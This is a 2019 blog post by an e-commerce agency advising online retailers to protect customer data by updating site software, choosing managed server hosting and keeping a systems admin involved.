Robust e-commerce: 2 ways to protect your customers from data breaches
- Business Savvy
- Web Development
Many brands have been subjected to malicious attacks. Whether they are government departments or e-commerce businesses, behind them are customers who’ve had their personal data stolen. And what do customers think about this? According to a study by KPMG, 19% say they’d stop shopping at a retailer altogether and a further 33% wouldn’t shop there for a while.
If the biggest global brands are not impervious to hacking, are you confident your systems (and customers) are safe? Maybe you think you’re too small for hackers to notice. And even so, you have great developers, respected payment platforms and robust processes. You’re safe enough.
But did you know:
- All data is at risk online because hackers are well-informed and persistent and will find a way to exploit your systems.
- Once your website is under attack, you’re on the clock. Your website needs to be strong enough to resist for as long as possible while you rally the troops.
- If an attack has been initiated, however good your website is, it will take human intervention to prevent a human gaining access to valuable information.
Now, we’re e-commerce specialists (not cyber security) and, as such, we know there are two elements you have full control over, both of which considerably influence how robust your digital platforms are. These are your site software and your server requirements. If you don’t attend to these, you’ll undoubtedly suffer a breach. And it will undoubtedly cost you – in customers, partners, revenue and fines.
1. Update and upgrade your site software
All websites should have their software updated regularly to keep abreast of security loopholes hackers could exploit. E-commerce sites are most at risk, but don’t let your guard down on your brochure site either. Updating your Magento, Sitecore, Drupal or WordPress promptly is painless. The cost depends on the plugins or extensions you’re running on top of your software – it might be free or require payment if it’s a big update.
On the other hand unpatched, unsecure platforms make it possible for hackers to upload their own files to the server and harvest customers’ financial information. It’s an easy task for them to create a redirect, at the point of payment, to a site that looks like a genuine payment portal.
Payment partners (like WorldPay, Sage Pay, PayPal and others) offer Payment Card Industry Data Security Standard (PCI DSS) compliance for your payments. There’s a risk they could terminate your contract if you don’t fulfill your side of the agreement by keeping your platform secure – that means updated. It goes without saying that any website storing users’ personal data has to be secure for GDPR purposes too.
While updates are patches to minimise security risks on your existing software, consider upgrades as your growth solution – for example, upgrading from Magento 1 to Magento 2. Upgrades offer your customers a more sophisticated user experience, which is vital to helping your business achieve its potential. Digital channels like websites always need to work better: faster, more intuitively.
The longer you wait to upgrade, the sooner your site starts to look outdated. This is the antithesis of your growth strategy, certainly if you’re transacting online, because in the eyes of the customer outdated means unsafe. Often, upgrading is essential to simply maintain your market position, depending on how fast your competitors are acting.
2. Choose a server package that meets your needs
Your goal is to slow the hackers down, to give your systems admin enough time to detect the risk and neutralise it. A breach is simply a matter of time once an attack has begun. Where you host your website – your server – is the most important factor in online security. It has to be a secured environment because it will be the first point of an attack.
There are two key types of hosting.
- Unmanaged service (there’s a need to engage a system admin – a human – to troubleshoot)
- Managed service (comes with a system admin; what they are responsible for will vary)
Server software (like Ubuntu and CentOS) has to be updated regularly to keep it secure and running optimally. While an unmanaged service will suit some businesses, we generally recommend a managed service with at least half a day a week for updating and testing server software.
Why might you need a managed service? CentOS, for example, has automated packages. These are great in principle but in reality can cause issues like corruption – which leads to costly and inconvenient downtime and lost revenue. With a managed service, your system admin will create a safe area to test the update. Half a day a week is the bare minimum; expect a systems admin (or web developer) to occasionally need more for ad hoc testing and fixing.
Technology is amazing but the only way to prevent a breach by a well-informed and persistent human hacker is intervention by a well-informed and tenacious human systems admin. This is why the role of your systems admin is so critical. Emergency intervention might mean pulling the website down. It will certainly mean moving your site to a server that is secure before anything can be fixed.
- Updating and appropriately upgrading your site and server is business critical
- Server updates will help slow hackers down until a systems admin can take action to prevent a data breach
- Ensure your systems admin takes a proactive role in your server security and updates
- Create a data breach emergency plan and regularly review
- Identify with your systems admin quiet times to schedule updates so there’s less inconvenience to customers
- Ensure your systems admin hides paths to databases and has switched on notifications that will alert on changes to critical back end systems
- Consider introducing robust internal security processes like users, passwords and data access rights
- Deal with these issues now and incorporate good security into your processes
Photo by rawpixel on Unsplash. This article first appeared on Medium.
02.05.2019|Your objective is to proactively respond with appropriate security interventions and communications. What’s the first thing you’d do?